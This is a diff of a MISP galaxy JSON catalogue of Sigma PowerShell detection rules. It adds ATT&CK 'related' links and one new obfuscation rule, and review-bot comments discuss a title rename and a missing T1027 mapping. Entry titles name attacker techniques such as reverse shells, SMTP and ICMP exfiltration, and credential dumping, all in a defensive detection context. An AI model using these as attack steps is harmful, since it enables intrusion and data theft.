@@ -18949,6 +23728,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dcd74b95-3f36-4ed9-9598-0490951643aa", "value": "Malicious PowerView PowerShell Commandlets" }, @@ -18975,6 +23763,22 @@ "attack.t1136.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "243de76f-4725-4f2e-8225-a8a69b15ad61", "value": "PowerShell Create Local User" }, @@ -18991,8 +23795,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/bohops/status/948061991012327424", "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml" ], "tags": [ @@ -19000,6 +23804,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4cd29327-685a-460e-9dac-c3ab96e549dc", "value": "Execution via CL_Invocation.ps1 - Powershell" }, @@ -19024,6 +23837,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "afd3df04-948d-46f6-ae44-25966c44b97f", "value": "PSAsyncShell - Asynchronous TCP Reverse Shell" }, 
@@ -19040,9 +23862,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" ], "tags": [ @@ -19050,6 +23872,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", "value": "Powershell Exfiltration Over SMTP" }, @@ -19067,8 +23898,8 @@ "logsource.product": "windows", "refs": [ "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" ], "tags": [ 
@@ -19093,8 +23924,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" ], "tags": [ @@ -19151,6 +23982,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ed965133-513f-41d9-a441-e38076a0798f", "value": "Suspicious PowerShell Invocations - Generic" }, @@ -19175,6 +24015,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dddfebae-c46f-439c-af7a-fdb6bde90218", "value": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction" }, @@ -19199,6 +24048,15 @@ "attack.t1119" ] }, + "related": [ + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c1dda054-d638-4c16-afc8-53e007f3fbc5", "value": "Automated Collection Command PowerShell" }, 
@@ -19215,11 +24073,11 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", - "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", - "http://woshub.com/manage-windows-firewall-powershell/", + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", + "http://woshub.com/manage-windows-firewall-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" ], "tags": [ @@ -19227,6 +24085,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "488b44e7-3781-4a71-888d-c95abfacf44d", "value": "Windows Firewall Profile Disabled" }, @@ -19252,6 +24119,15 @@ "attack.t1136.002" ] }, + "related": [ + { + "dest-uuid": "7610cada-1499-41a4-b3dd-46467b68d177", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", "value": "Manipulation of User Computer or Group Security Principals Across AD" }, 
@@ -19276,6 +24152,15 @@ "attack.t1070.003" ] }, + "related": [ + { + "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "602f5669-6927-4688-84db-0d4b7afb2150", "value": "Disable Powershell Command History" }, @@ -19325,6 +24210,15 @@ "attack.t1555.003" ] }, + "related": [ + { + "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fc028194-969d-4122-8abe-0470d5b8f12f", "value": "Access to Browser Login Data" }, @@ -19342,9 +24236,9 @@ "logsource.product": "windows", "refs": [ "https://youtu.be/5mqid-7zp8k?t=2481", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" ], "tags": [ @@ -19375,6 +24269,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "value": "Import PowerShell Modules From Suspicious Directories" }, @@ -19423,6 +24326,15 @@ "attack.t1555" ] }, + "related": [ + { + "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", "value": "Dump Credentials from Windows Credential Manager With PowerShell" }, 
@@ -19448,6 +24360,15 @@
 "attack.t1573"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "195626f3-5f1b-4403-93b7-e6cfd4d6a078",
 "value": "Suspicious SSL Connection"
 },
@@ -19473,7 +24394,7 @@
 "value": "Potential In-Memory Execution Using Reflection.Assembly"
 },
 {
- "description": "Detecting use WinAPI Functions in PowerShell",
+ "description": "Detects use of WinAPI Functions in PowerShell scripts",
 "meta": {
 "author": "Nikita Nazarov, oscd.community, Tim Shelton",
 "creation_date": "2020/10/06",
@@ -19494,8 +24415,24 @@
 "attack.t1106"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "03d83090-8cba-44a0-b02f-0b756a050306",
- "value": "Accessing WinAPI in PowerShell"
+ "value": "Potential WinAPI Calls Via PowerShell Scripts"
 },
 {
 "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n",
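Review bot: Renaming `value` from `Accessing WinAPI in PowerShell` to `Potential WinAPI Calls Via PowerShell Scripts` while keeping `uuid` `03d83090-8cba-44a0-b02f-0b756a050306` is the right way to carry a Sigma title change — MISP instances key clusters on the uuid — but anything that matches on the rendered galaxy tag string (`misp-galaxy:sigma-rules="Accessing WinAPI in PowerShell"`) will presumably stop matching after the update. Since the title comes straight from upstream Sigma, this cannot be avoided in the generator, but a one-line mention of value renames in the commit message or changelog would save consumers a surprise. The two `related` links added for this entry (T1059.001 and T1106) match its `attack.t1106`/`attack.t1059.001` tags, which is what the rest of the diff does as well.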
@@ -19510,8 +24447,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", "https://www.powershellgallery.com/packages/DSInternals", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" ], "tags": [ @@ -19519,6 +24456,15 @@ "attack.t1003.006" ] }, + "related": [ + { + "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", "value": "Suspicious Get-ADReplAccount" }, @@ -19561,8 +24507,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", "https://adsecurity.org/?p=2604", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" ], @@ -19571,6 +24517,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "61d0475c-173f-4844-86f7-f3eebae1c66b", "value": "Change PowerShell Policies to an Insecure Level - PowerShell" }, 
@@ -19611,8 +24566,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" ], "tags": [ @@ -19620,6 +24575,15 @@ "attack.t1553.005" ] }, + "related": [ + { + "dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5947497f-1aa4-41dd-9693-c9848d58727d", "value": "Suspicious Unblock-File" }, @@ -19668,6 +24632,15 @@ "attack.t1555" ] }, + "related": [ + { + "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "603c6630-5225-49c1-8047-26c964553e0e", "value": "Enumerate Credentials from Windows Credential Manager With PowerShell" }, @@ -19694,6 +24667,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell" }, 
@@ -19710,8 +24692,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml" ], "tags": [ @@ -19743,6 +24725,15 @@ "attack.t1546.013" ] }, + "related": [ + { + "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152", "value": "Powershell Trigger Profiles by Add_Content" }, @@ -19791,6 +24782,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b5522a23-82da-44e5-9c8b-e10ed8955f88", "value": "Powershell Execute Batch Script" }, @@ -19817,6 +24817,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell" }, 
@@ -19842,6 +24851,15 @@ "attack.t1484.001" ] }, + "related": [ + { + "dest-uuid": "5d2be8b9-d24c-4e98-83bf-2f5f79477163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", "value": "Modify Group Policy Settings - ScriptBlockLogging" }, @@ -19866,6 +24884,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", "value": "Powershell Store File In Alternate Data Stream" }, @@ -19913,6 +24940,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", "value": "Suspicious PowerShell Download - Powershell Script" }, @@ -19929,8 +24965,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml" ], "tags": [ 
@@ -19938,6 +24974,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b8af5f36-1361-4ebe-9e76-e36128d947bf", "value": "Use Remove-Item to Delete File" }, @@ -19964,6 +25009,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ca8b77a9-d499-4095-b793-5d5f330d450e", "value": "PowerShell Credential Prompt" }, @@ -19989,6 +25043,15 @@ "attack.t1021.006" ] }, + "related": [ + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", "value": "Execute Invoke-command on Remote Host" }, @@ -20014,6 +25077,15 @@ "attack.t1565" ] }, + "related": [ + { + "dest-uuid": "ac9e6b22-11bf-45d7-9181-c1cb08360931", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4368354e-1797-463c-bc39-a309effbe8d7", "value": "Powershell Add Name Resolution Policy Table Rule" }, @@ -20038,6 +25110,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f62176f3-8128-4faa-bf6c-83261322e5eb", "value": "Malicious PowerShell Keywords" }, 
@@ -20064,6 +25145,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0adfbc14-0ed1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell" }, @@ -20088,6 +25178,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "88f0884b-331d-403d-a3a1-b668cf035603", "value": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock" }, @@ -20137,6 +25236,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bf72941a-cba0-41ea-b18c-9aca3925690d", "value": "PowerShell ADRecon Execution" }, @@ -20162,6 +25270,15 @@ "attack.t1615" ] }, + "related": [ + { + "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eb2fd349-ec67-4caa-9143-d79c7fb34441", "value": "Suspicious GPO Discovery With Get-GPO" }, @@ -20187,6 +25304,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", "value": "Powershell LocalAccount Manipulation" }, 
@@ -20211,6 +25337,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4c4af3cd-2115-479c-8193-6b8bfce9001c", "value": "PowerShell ICMP Exfiltration" }, @@ -20242,6 +25377,36 @@ "attack.s0363" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3ceb2083-a27f-449a-be33-14ec1b7cc973", "value": "Silence.EDA Detection" }, @@ -20258,8 +25423,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" ], "tags": [ 
@@ -20267,6 +25432,15 @@ "attack.t1571" ] }, + "related": [ + { + "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", "value": "Testing Usage of Uncommonly Used Port" }, @@ -20306,9 +25480,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" ], "tags": [ @@ -20340,6 +25514,15 @@ "attack.t1491.001" ] }, + "related": [ + { + "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", "value": "Replace Desktop Wallpaper by Powershell" }, @@ -20387,6 +25570,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd185561-4760-45d6-a63e-a51325112cae", "value": "Live Memory Dump Using Powershell" }, 
@@ -20441,9 +25633,53 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0",
 "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell"
 },
+ {
+ "description": "Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2023/01/08",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_susp_set_alias.yml",
+ "level": "low",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/1337Rin/Swag-PSO",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_set_alias.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.execution",
+ "attack.t1027",
+ "attack.t1059.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "96cd126d-f970-49c4-848a-da3a09f55c55",
+ "value": "Potential PowerShell Obfuscation Using Alias Cmdlets"
+ },
 {
 "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.",
 "meta": {
@@ -20506,8 +25742,8 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "http://www.powertheshell.com/ntfsstreams/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md",
+ "http://www.powertheshell.com/ntfsstreams/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml"
 ],
 "tags": [
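Review bot: The new `Potential PowerShell Obfuscation Using Alias Cmdlets` entry carries both `attack.t1027` and `attack.t1059.001` in `tags`, but its `related` list only links the T1059.001 attack-pattern (`970a3432-3237-47ad-bcca-7d8cbb217736`); the T1027 (obfuscation) mapping the rule author intended is silently dropped. Elsewhere in this diff the generator does emit one `related` item per technique tag (the `NTFS Alternate Data Stream` entry gets both T1564.004 and T1059.001), and the Invoke-Obfuscation entries here also end up with only the T1059.001 link, so this looks like T1027 is missing from the generator's technique-to-UUID lookup rather than a one-off — worth verifying against the mitre-attack-pattern galaxy and fixing in the generator before regenerating, rather than hand-editing this file. Separately, the description `Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts` is copied verbatim from the upstream rule and should be corrected there (`posh_ps_susp_set_alias.yml`) so the next regeneration does not reintroduce it. The `creation_date` of `2023/01/08` also suggests this hunk comes from a later patch in the series than the December 2022 file creation, which is fine but makes the series harder to follow without a note.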
